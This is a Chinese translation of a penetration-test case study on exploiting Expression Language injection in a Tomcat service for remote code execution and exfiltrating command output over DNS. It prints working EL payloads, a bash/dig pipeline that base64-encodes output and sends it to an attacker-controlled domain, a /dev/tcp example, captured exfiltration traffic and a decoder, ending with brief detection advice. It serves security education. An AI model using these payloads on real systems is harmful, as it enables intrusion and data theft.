基于DNS的一次渗透测试

最近，我们在某个Tomcat Web服务中发现了一个涉及表达式语言的远程代码执行。存在缺陷的端点期望接受一个数字。但是当我发送${1+2}时，站点会返回一个Java错误信息，关于将java.lang.String转换为java.lang.Long的失败消息，其中显示了值3。

从这个错误信息中，我们可以知道以下信息：

• 应用使用Java

• 我们能够执行EL表达式

• EL引擎的输出总是以字符串的形式返回

当你能够在Java中执行代码时，最有趣的部分就是检查是否能够通过Runtime对象执行任意系统命令。

当发送${Runtime.getRuntime()}时，会被解析为java.lang.Runtime@de30bb。很好，那么我们可以使用Runtime.exec(String cmd)执行任意代码吗？

但很可惜的是，我们无法创建任何新对象。因此${Runtime.getRuntime().exec("id")}无法生效。由于EL处理抛出的异常不包含在显示的页面中，因此我们获得的信息很少，很难进行调试，也不知道是否有WAF过滤了我们的payload，或者存在其他防御措施。

不过EL允许访问文档中定义的一些隐式对象。其中一个对象param看起来很有趣，因为它可以将请求参数解析为字符串。很快，在一个请求之后，我们成功获得了${Runtime.getRuntime().exec(param.cmd)}的命令输出：java.lang.UNIXProcess@2f0a8ba。但是命令执行成功了吗？它的输出是什么？当我们尝试从UNIXProcess中读取stdout时，必须围绕一个InputStreamReader创建一个BufferedReader，以读取subprocess的输出。

确定调用是否成功的一种方法是检查它的返回值。由于返回值的性质（它只在进程完成时可用），Java的Process接口提供了一个int waitFor()方法以暂停main thread，直到subprocesses完成。它的返回值表示subprocess的状态码。

在对payload进行了小的调整之后，我们可以看到${Runtime.getRuntime().exec(param.cmd).waitFor()}与cmd==sleep+10的组合，其响应时间仅为10秒多一点，并且会出现一个不能将“0”转换为Long的错误消息。

但是输出呢？我看到过一篇关于DNS利用的文章。到目前为止，我们只讨论了Tomcat中的RCE。考虑到无法在页面中看到命令输出，所以我们需要使用带外通信。最简单的方法就是使用curl、wget或netcat，向我们的服务器发送一个HTTP请求。

为了检查curl的可用性，我们只需使用我们的Burp Collaborator来测试。而waitFor显示状态码为7，这对于curl来说意味着连接到主机失败。然后我们检查了Collaborator，它只显示了一个成功的DNS请求。

我们通过执行dig <domain>来快速检查服务器上是否安装了nslookup、dig或drill等DNS工具。

对于只提取用户信息，那么只需较短的PoC。payload为id | base64 -w 60 | xargs -I ',' dig ,.<domain>。当发送请求后，我们可以看到返回值是1，这代表一个错误，尽管在我们的机器上测试一切正常。经过研究，我们发现Java存在一种安全防御措施，防止攻击者将多个命令注入到Runtime.exec(String)中的字符串中。因此，Java提供的是Runtime.exec(String[])，elements作为参数。

还有一个问题，EL不允许我们编写类似${Runtime.getRuntime().exec(new String[]{param.one, param.two, ...})}的语句。事后看来，我们也许可以使用隐式的paramValues对象，但当时我们完全忽略了这一点。相反，我们使用了pageContext.request.getParameterValues(param.name)，它会返回一个数组，其中包含在param.name中指定参数的所有值。最后的payload是：

${Runtime.getRuntime().exec(pageContext.request.getParameterValues(param.name)}

参数有name=cmd和cmd=bash&cmd=-c&cmd=<payload>。通过这种方法，我们借助脚本实现执行每个命令的payload。

基本

DNS exfiltration指使用DNS请求传递数据，可以在“正常”互联网流量被阻塞或过滤的情况下使用。其基本思想是通过DNS请求将数据发送到攻击者的DNS服务器上。

设置

我们需要可在目标系统上创建DNS请求的任何工具。这可以是一个专用程序，如dig或drill，也可以是任何网络工具，如wget、curl、netcat、host、bash -c "echo "test" > /dev/tcp/$host/$port等。

在接收端，我们需要一个UDP的53端口在公网可达的服务器，任何VPS都应该可以，你也可以通过端口转发实现。

为了指示DNS解析器向我们的服务器发送请求，我们需要在指向我们的服务器IP的任何域中设置一个NS记录。

最后，监听53端口上接收到的请求。

工具

在我们的项目中，我们只需要一个PoC，所以payload并没有多复杂。

不过我们对其通用性进行了改进，并且所使用的大多数命令在多数Linux系统中都默认存在。

<cmd> | base64 -w 60 | cat -n | awk '{{$1=$1}};1' | sed 's/ /\\n/' | xargs -L 2 -n 2 bash -c 'dig $1.$0.<domain>'

说明：

1.运行所需命令

2.使用base64进行数据编码，在60个字符后自动换行。

3.使用cat -n在每行前面都将加上相应的行号

4.使用awk删除所有头部空格

5.使用sed将行号和内容分成两个单独的行

6.使用xargs使用两行作为bash的两个参数

7.使用dig配合<data>.<line no>.<domain>发出请求。

为了捕获DNS请求，我们简单地将53端口的UDP数据包导出。当运行例如id等命令时，会得到如下的输出：

16:44:24.860040 IP XXX.XXX.XXX.XXX.47679 > YYY.YYY.YYY.YYY.53: 61071 [1au] A? dWlkPTEwMDAoaG56bG1ubikgZ2lkPTk4NSh1c2VycykgZ3JvdXBzPTk4NSh1.1.<domain>. (103)
16:44:24.887303 IP XXX.XXX.XXX.XXX.39556 > YYY.YYY.YYY.YYY.53: 2045 [1au] A? c2VycyksNTQobG9jayksOTgocG93ZXIpLDEwOCh2Ym94dXNlcnMpLDE1MCh3.2.<domain>. (103)
16:44:25.050284 IP XXX.XXX.XXX.XXX.45014 > YYY.YYY.YYY.YYY.53: 34349 [1au] A? aXJlc2hhcmspLDk3MyhsaWJ2aXJ0KSw5ODYodmlkZW8pLDk4Nyh1dWNwKSw5.3.<domain>. (95)
16:44:25.080283 IP XXX.XXX.XXX.XXX.45614 > YYY.YYY.YYY.YYY.53: 34497 [1au] A? ODgoc3RvcmFnZSksOTk1KGF1ZGlvKSw5OTgod2hlZWwpCg==.4.<domain>. (95)

在接受的数据中，可能有一些重复部分，还可能会出现接受顺序混乱的情况。

为了处理重复和排序的问题，我们可以使用以下命令：

cat $1 | egrep -o '[^ ]\.<domain>' | sed 's/\.<domain>//' | sed 's/\./\t/' | sort -k2 | uniq | sed 's/\t.//' | tr -d "\n" | base64 -d

说明：

1.提取以指定域结尾的数据

2.删除域部分

3.根据.号拆分字段，插入tab

4.按第二列（行号）对所有条目进行排序

5.删除所有重复项

6.删除行号

7.把所有的行连接成一行

8.使用base64进行解码

针对上面的数据，明文为：

uid=1000(hnzlmnn) gid=985(users) groups=985(users),54(lock),98(power),108(vboxusers),150(wireshark),973(libvirt),986(video),987(uucp),988(storage),995(audio),998(wheel)

由于编写bash脚本是很痛苦的，我开发了Dora the DNS explorer。Dora使用scapy来嗅探接口，解析接收到的每个DNS请求并将其存储在数据库中。为了将不同命令的输出彼此分离，我引入了域的另一部分，被称为context。通过使用Swiper(该工具的提取部分)，你可以针对不同的工具生成payload，或者简单生成一个在payload中使用的新context。

其他

如果攻击者开始通过DNS传递数据，系统会发现DNS流量突然增长。所以某个主机DNS请求数量的突然上涨可能预示着攻击者已控制服务器。为了阻止这种攻击，可将内部网络的所有的DNS请求转到内部上游的DNS服务器中，并设置域名白名单，对可疑域名禁止请求。

本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场
来源：https://insinuator.net/2020/03/dns-exfiltration-case-study/